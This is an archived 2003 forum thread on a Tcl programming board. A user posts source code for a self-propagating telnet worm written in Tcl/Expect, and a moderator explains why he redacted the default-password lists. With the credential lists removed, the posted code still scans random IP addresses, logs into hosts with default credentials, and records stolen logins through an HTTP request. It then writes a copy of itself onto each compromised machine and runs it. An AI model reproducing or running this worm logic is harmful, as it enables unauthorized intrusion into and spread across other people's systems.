Posted by sirius_black (sirius_black), 12 December 2003
Hi !!
Here is a worm in coded in Tcl/Expect.
It's the first version.
It's looking for box with default password and save the ip/login/password in a database (accessed by a php script)
If you have some ideas to improve it...
Code:#!/usr/bin/expect # tclworm v1.0 # by sirius_black # http://membres.lycos.fr/lotfree
if {[fork]!=0} exit disconnect
set wget_found 0 set telnet_found 0 set wget_path "" set telnet_path ""
set liste_telnet { "" "" admin 1234 admin admin *** Chunk of information removed here for security reasons *** test test User "" write "private" write synnet }
set liste_cisco { "" "" admin admin admin "default" *** Chunk of code removed here for security reasons *** ripeop "" root attack }
proc get_random_ip {} { set tcl_precision 3 set ip "" append ip [expr round((rand()*1000)/4)] for {set i 0} {$i < 3} {incr i 1} { append ip "." append ip [expr round((rand()*1000)/4)] } return $ip }
proc is_telnet_open ip { set is_open 0 if { [catch {set sock [socket $ip 23]} ] } { set is_open 0 } else { set is_open 1 close $sock } return $is_open }
proc where_are_progs {} { global wget_found global telnet_found global wget_path global telnet_path if [file exists "/usr/bin/wget"]==1 { set wget_found 1 set wget_path "/usr/bin/wget" } if [file exists "/usr/bin/telnet"]==1 { set telnet_found 1 set telnet_path "/usr/bin/telnet" } }
proc whereis_worm {} { set worm_path [pwd] set file_name [lindex [split [info script] "/"] end] append worm_path "/" $file_name return $worm_path }
proc get_content {} { set f [open [whereis_worm] "r"] set texte "" while { ![eof $f] } { set ligne [gets $f] set ligne [string map {\\ \\\\ \$ \\\$ \` \\\`} $ligne] set ligne [string trim $ligne] append texte "$ligne\n" } close $f return $texte }
proc MyIpaddr {} { set addr "" if {[catch {dns address [info hostname]} addr]} { set server [socket -server # 0] set port [lindex [fconfigure $server -sockname] 2] set host [lindex [fconfigure $server -sockname] 1] set client [socket $host $port] set addr [lindex [fconfigure $client -sockname] 0] close $client close $server } return $addr }
proc MyNet {} { set net "" regexp {(.*)\..*} [MyIpaddr] {} net return $net }
proc declare_becane {ip login password} { set lheaders "Connection close" if {![llength [info commands "::http::geturl"]]} { if {[catch {package require http}]} { return "zut" } } ::http::config -useragent "TCLWORM v1.0 (LOTFREE)" set htmlUrl "http://localhost:3128/wormstat.php?ip=$ip&login=$login&pass=$password" if { [catch { ::http::geturl $htmlUrl} token]} { return "zut" } if { [::http::status $token] != "ok"} { return "zut" } set htmlFile [::http::data $token] if { [regexp "haxored" $htmlFile] == 1 } { return "next" } return "go" }
where_are_progs
set ip "" while {1==1} { set ip [get_random_ip] if { [regexp "^127" $ip] == 1 } { continue } if { ![is_telnet_open $ip] } { continue } else { if {$telnet_found == 1} { #on utilise telnet foreach {login passwd} $liste_telnet { spawn -noecho $telnet_path $ip 23 expect { "ogin:" { send "$login\n" } "user:" { send "$login\n" } "imeout" { continue } "ailure" { continue } "nknow host" { continue } "o route to host" { continue } "o adresse associated with name" { continue } } expect { "incorrect" { continue } "ssword:" { send "$passwd\n" } } expect { "ast login:" { if { [declare_becane $ip $login $passwd] == "next" } { send "logout\nexit\n" continue } else { exec sleep 2 send "cat > tclworm << EOF\n" expect ">" send [get_content] expect ">" send "EOF\n" expect "$" send "chmod +x tclworm\n" expect "$" send "./tclworm\n" expect "$" send "logout\nexit\n" break } } } } } # fin de on utilise telnet
} } |
|
This post was modified to remove data which could help malicious users run the program against networks where they are not authorised to do so. See follow up post for my fuller explanantion - GrahamPosted by admin (Graham Ellis), 13 December 2003
Hmmm
Expect is a great tool for automated testing which is exaclty what you're using it for ...
Programs such as the one that you have posted are valuable in the right hands - they allow (let us say) a system administrator to check the security of his own network against breakins. But in the wrong hands, such programs provide tools for the unauthorised visitor to find weaknesses and attempt breakins.
Posting up complete code for a "worm" such as this is similar to posting up someone else's password in that it lessens their security and for this reason I am modifying your post to remove some of the data (not-Tcl) elements of the code. That way, it remains available for discussion of the Tcl issues, but doesn't provide anyone who happens to find it with a breaking-in tool!
Graham (Wearing his moderator's hat!)
Posted by sirius_black (sirius_black), 15 December 2003
yes I understand.
The reason I made it was only to understand how a worm works.
I don't want the worm to delete file or crash systems. I only use it to see statistics of propagation ...
It was very interestant (does this word exist in english ?) to code it
and I want to share the source with others programmers
Posted by admin (Graham Ellis), 15 December 2003
I'm 100% happy with posting / sharing code - I just modified it slightly so that this board doesn't become a place for people to get hold of code that could easily be misused.
This page is a thread posted to the opentalk forum
at
www.opentalk.org.uk and
archived here for reference. To jump to the archive index please
follow
this link.